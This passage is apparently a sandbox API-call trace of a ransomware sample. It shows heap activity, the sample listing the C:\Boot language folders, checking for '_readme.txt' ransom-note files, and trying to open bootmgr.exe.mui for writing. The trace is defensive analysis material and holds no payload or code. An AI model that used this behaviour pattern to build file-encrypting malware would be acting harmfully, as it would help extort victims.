[0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.176] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.176] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.177] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.177] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.178] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.178] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99c9c68 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.179] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.179] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99c9c68 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.180] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.180] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.181] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.181] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.181] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0093.181] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.181] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.181] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.181] PathFindFileNameW (pszPath="") returned="" [0093.181] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.182] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.182] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.182] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d1120 | out: hHeap=0x680000) returned 1 [0093.182] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.182] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0093.183] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0093.183] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99c9c68 | out: hHeap=0x680000) returned 1 [0093.183] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.184] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.184] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.184] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\bootmgr.exe.mui") returned=".mui" [0093.184] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-cn\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.184] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0093.184] PathFindExtensionW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned=".txt" [0093.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d3580 | out: hHeap=0x680000) returned 1 [0093.184] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0093.184] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0093.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.184] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.184] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.184] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.184] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.185] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.185] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.186] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.186] PathFindFileNameW (pszPath="C:\\Boot\\zh-HK\\") returned="zh-HK\\" [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.186] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0093.186] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0093.186] PathFindFileNameW (pszPath="") returned="" [0093.186] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef7e8 [0093.186] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0093.187] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0093.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x800) returned 0x31d1120 [0093.187] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x31d1120 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0093.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x810) returned 0x99ca4f0 [0093.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.187] FreeLibrary (hLibModule=0x75670000) returned 1 [0093.187] PathAppendW (in: pszPath="C:\\Boot\\zh-HK\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0093.187] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99c9c68 [0093.187] PathFileExistsW (pszPath="C:\\Boot\\zh-HK\\_readme.txt") returned 1 [0093.188] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31c7500 [0093.188] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa34a3340, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa34a3340, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.188] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc20 [0093.188] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3268 [0093.188] PathFindExtensionW (pszPath="C:\\Boot\\zh-HK\\bootmgr.exe.mui") returned=".mui" [0093.188] CreateFileW (lpFileName="C:\\Boot\\zh-HK\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-hk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.188] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa34a3340, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa34a3340, 